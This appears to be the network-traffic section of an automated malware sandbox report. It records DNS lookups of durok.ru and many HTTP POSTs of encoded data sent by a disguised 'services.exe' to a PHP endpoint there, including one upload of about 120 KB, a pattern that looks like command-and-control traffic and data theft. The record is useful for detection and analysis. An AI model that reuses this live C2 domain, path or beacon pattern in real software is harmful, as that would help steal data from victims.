                                                                                                                              Dec 26, 2024 17:19:03.365837097 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.366646051 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.486402035 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.486505985 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.486768007 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.486841917 CET8049974104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.486895084 CET4997480192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.606385946 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.672945023 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.833610058 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.833729029 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:03.925323009 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.953315973 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:03.953444004 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.061783075 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.078461885 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.184561968 CET8049976104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.184753895 CET4997680192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.199285030 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.199397087 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.199542999 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.319013119 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.552719116 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.664607048 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.672435045 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.672444105 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.672475100 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:04.833576918 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:04.917418003 CET8049981104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:05.146074057 CET4998180192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:05.377367973 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:05.432230949 CET4998380192.168.2.4104.21.93.162
                                                                                                                              Dec 26, 2024 17:19:05.673398972 CET8049983104.21.93.162192.168.2.4
                                                                                                                              Dec 26, 2024 17:19:05.826234102 CET4998380192.168.2.4104.21.93.162
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 17:17:10.278554916 CET | 51862 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 17:17:10.650877953 CET | 53 | 51862 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 17:17:10.278554916 CET | 192.168.2.4 | 1.1.1.1 | 0x52aa | Standard query (0) | durok.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 17:17:10.650877953 CET | 1.1.1.1 | 192.168.2.4 | 0x52aa | No error (0) | durok.ru | | 104.21.93.162 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 17:17:10.650877953 CET | 1.1.1.1 | 192.168.2.4 | 0x52aa | No error (0) | durok.ru | | 172.67.212.19 | A (IP address) | IN (0x0001) | false
                                                                                                                              • durok.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:10.795922995 CET | 330 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 344
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:17:11.952718019 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:12.211527109 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:12 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1GkDfxkTe4SGGOLB5RPLeJHY7d57NnKjuCzYSx6agSced%2FtJgG88xZrfacSnt%2FGPB%2BzXdSXA6js0XbDNrun7myMa3G31%2Fn6p2hGvZ5rCJJtVqW8Mfm2TJSOOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826130ac3542cb-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3035&min_rtt=1581&rtt_var=3502&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=110438&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 26, 2024 17:17:12.255414963 CET | 306 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 384
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:12.588042021 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:12.590327024 CET | 384 | OUT
Dec 26, 2024 17:17:13.083152056 CET | 947 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:12 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2PP1X7Lg6E7GcIvzohvXC0s2T%2F3zXXT2RRbzHgrILSeQwx4y50b7hLKmMbgHktrnF0jGT6kckuR3He1oqaiDRFCG8M2Sl%2BcbTaRhtXBPsoqcVFIO94cG2Qipw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826134a98742cb-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4824&min_rtt=1572&rtt_var=6154&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2166&recv_bytes=1364&delivery_rate=2660996&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 26, 2024 17:17:13.106422901 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 1916
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:13.439193964 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:13.441595078 CET | 1916 | OUT
Dec 26, 2024 17:17:13.934827089 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qPAncYrbeU%2B2TqMWJvp30Uq3RSTBtXtTdqarzfyRNGnIs2gZ7n38Vg4sxQGycfyOest3FL9tWKmW859OGWYJEUKczK%2FuLFct9dImmmwMw9jDhtdnLh%2F20NaYew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826139f9bf42cb-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5306&min_rtt=1572&rtt_var=5817&sent=12&recv=14&lost=0&retrans=0&sent_bytes=3138&recv_bytes=3587&delivery_rate=2660996&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:12.449456930 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:17:12.802196980 CET | 2548 | OUT
Dec 26, 2024 17:17:13.626831055 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:13.878189087 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=koJ%2FIAhKN1gL8ANPMbkc81eD8KfxrivE1PcGALbGCaqiYaStWfaQCDUIqmnvuge%2FDQLnzIP8c4dANCGbhovuVUlqUuUtZUaq52%2BwNdFZAzBZ3rcn5%2FZOwIFqrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82613b29645e86-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4747&min_rtt=1614&rtt_var=6872&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=54720&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:14.768544912 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:15.087529898 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2124
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:17:15.443037987 CET | 2124 | OUT
Dec 26, 2024 17:17:16.264548063 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:16.545506954 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W%2FTZ8%2BXoAAVd9WVqkHqxv1pkRvVhO1nwAXEw6HI3JxRLDKLz1lONaIEfIo3bLPWPyodLcLy%2FiS2rMrePgJe08AZ4tnoV24NYTky4WzC70QebpAwrNIRennCcFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82614b9a1a0f89-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3202&min_rtt=1629&rtt_var=3757&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2455&delivery_rate=102708&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49738 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:15.314666033 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:17:15.670962095 CET | 2548 | OUT
Dec 26, 2024 17:17:16.492837906 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:17:16.752651930 CET | 789 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCs5UFbXWQhyQTxc3UqyWE0pLBD9l49Mn2Jh%2Baq%2BZx53uI7AQwm3ig2xGznmQkaE3A6PUpOlfVkN3XVkYD2nxYHB1oWtz7ZZLF7UHniXfRdZq72a9amZ2vuQ2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82614d0a0b43d5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4054&min_rtt=1669&rtt_var=5396&sent=3&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=70354&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a
                                                                                                                              Data Ascii: 4=Y]T
Dec 26, 2024 17:17:16.962876081 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49740 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:17:17.604784966 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:17.958554029 CET | 2548 | OUT | Data Raw: 59 59 5e 5f 54 59 59 5b 5e 58 52 54 56 5f 58 5b 54 5d 5b 5b 56 57 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^_TYY[^XRTV_X[T][[VWS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(1_+)*!2 /=.?'"Z$$7?8V4!,:+>0$="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:18.784296036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:19.038444996 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7FKtwM9pMuv5PWkJo8XTFCPZC%2FTLVuytyIe3LD32lTBE4Na2lZPuTTNDWYagtpZhlwIeMZ6F72wjs0IQbxZ%2F29PK2msg18tywiTC1i2QCPSOH4LS%2BQHhbZjZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82615b5e524321-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4814&min_rtt=1770&rtt_var=6753&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=55878&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:19.285165071 CET | 353 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary=----vFxcW3kj68Y95SNWcK2HlrJWzuTAkIi5Xg
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 120494
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:19.617876053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:21.096920967 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:20 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Pjf828uXTSj50tQ5KMDjWk50lUgjOjob0uYv2AHysiA%2BxzhqJPbVia4Pe9wXnjwvhKrY6EOilhs731u%2B%2Fc1rBbrW%2F%2FRQcEqywvYZc4VN8gflp4FQVSj1ttdwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261609c9f4321-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6413&min_rtt=1707&rtt_var=8319&sent=70&recv=133&lost=0&retrans=0&sent_bytes=846&recv_bytes=123702&delivery_rate=1633109&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:21.104305029 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:21.436883926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:21.966892958 CET | 952 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:21 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydJqlSuH9I4zw2eyqDRsJkcP%2BF6alwd3QE4RTPxhWQU5tCn%2FOSsFYrgXAWZ5AIv4ei54gYtKbCP4z503FG86ZTY2Vu3qU7WGYwwgaFpqjnn8jC2tnW46qHmFoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82616bfafa4321-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6803&min_rtt=1681&rtt_var=7506&sent=76&recv=139&lost=0&retrans=0&sent_bytes=1679&recv_bytes=126137&delivery_rate=1681059&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5b 3e 39 09 1a 34 12 0d 08 2b 2d 3a 14 3e 1f 03 1a 3c 0c 0c 00 28 01 00 1e 2a 28 01 51 34 29 2d 00 3e 14 0e 59 25 26 22 1f 25 0b 2e 5c 05 1d 27 17 28 3b 2b 06 33 21 35 13 29 07 39 1a 3d 07 26 04 25 3f 2f 5d 20 3b 08 5c 23 32 38 59 2c 3c 0d 01 39 02 28 5b 28 56 3a 12 36 07 21 51 0c 1f 38 1f 23 3a 3f 13 27 3e 22 0d 35 0e 23 1f 25 28 32 10 22 28 34 09 26 2a 2f 10 25 33 24 0a 23 2e 27 55 28 13 08 58 26 3c 2a 01 29 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$[>94+-:><(*(Q4)->Y%&"%.\'(;+3!5)9=&%?/] ;\#28Y,<9([(V:6!Q8#:?'>"5#%(2"(4&*/%3$#.'U(X&<*)%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              6 | 192.168.2.4 | 49741 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:17.695915937 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:18.052509069 CET | 2128 | OUT | Data Raw: 59 5d 5e 59 54 5c 59 57 5e 58 52 54 56 50 58 53 54 57 5b 5d 56 53 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^YT\YW^XRTVPXSTW[]VSSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')23+:9W6?.=*>$!$'/X"<$P#-*8<=5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:18.874296904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:19.126353025 CET | 946 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjWpd3soPuSJ2AjT%2FaGedHT0DUHfDoi2RISvbW2sP%2FtGhGB4wzbzJLGK0IUVggAdNMy5XqL0rqVmHsRHK655RsSbfXFQqG5M27VOd0w%2Bj6ozJn07ygk7PPlWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82615bec9d43c9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3288&min_rtt=1766&rtt_var=3706&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=104704&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 3e 17 06 0b 37 02 30 1d 3c 03 2a 14 2a 32 21 5d 2b 31 29 5d 2b 2f 07 0c 3f 2b 33 57 20 04 2a 59 29 04 2c 10 25 18 26 58 26 21 2e 5c 05 1d 27 5c 3c 02 24 5f 24 22 36 06 29 10 2a 41 29 2d 22 06 30 3f 3f 12 23 5d 3a 15 37 0f 3c 11 3b 05 33 07 2e 5a 20 59 3f 20 2d 05 35 17 21 51 0c 1f 38 56 36 3a 27 5e 27 2e 0b 57 22 33 20 08 25 16 2e 57 22 5d 23 57 30 14 02 02 27 20 3c 0b 23 3e 23 10 28 03 2d 03 32 11 26 04 2a 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
